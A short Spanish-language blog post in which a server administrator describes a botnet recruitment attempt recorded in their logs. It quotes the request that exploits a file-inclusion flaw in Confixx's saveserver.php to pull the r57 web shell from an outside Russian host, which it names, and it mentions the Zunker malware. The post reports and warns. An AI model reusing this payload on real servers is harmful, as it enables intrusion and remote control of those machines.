Una red de bots o BotNet es un conjunto de ordenadores que ejecutan tareas de forma autonoma y con un objetivo, asi, dicho burdamente.

Recientemente he visto que mi servidor ha sido 'premiado' con un boleto para pertenecer a una red de este tipo. Lastima que no haya sido agraciado ;)

El origen del ataque procede de una ip suiza (quiza un bot controlado) que intenta buscar y ejecutar en mi servidor lo siguiente:

HEAD http://80.3xxx.xxx.xxx
/admin/business_inc/saveserver.php?thisdir=http://seyyar.by.ru/r57.php?\xa6POST\xa6r57shell\xa6\xa6\xa6 HTTP/1.0

El fichero saveserver.php pertenece a un software llamado Confixx que tiene una variable no declarada que no se valida, thisdir :).

Mas información en securityfocus

PandaLabs descubrio Zunker, un software creado para infectar a traves de la selección cuidadosa de vulnerabilidades de la maquina en cuestion y la posterior ejecucion de los correspondientes exploits.

Mas información de zunker, aqui

En este servidor ruso alojan el zunker, cuidado en donde pinchamos. * http://seyyar.by.ru/

Conclusiones:

Parece que las redes de bots se estan extendiendo y los zombies nos intentan morder a toda costa. Tendremos que tomar las medidas preventivas para evitarlo.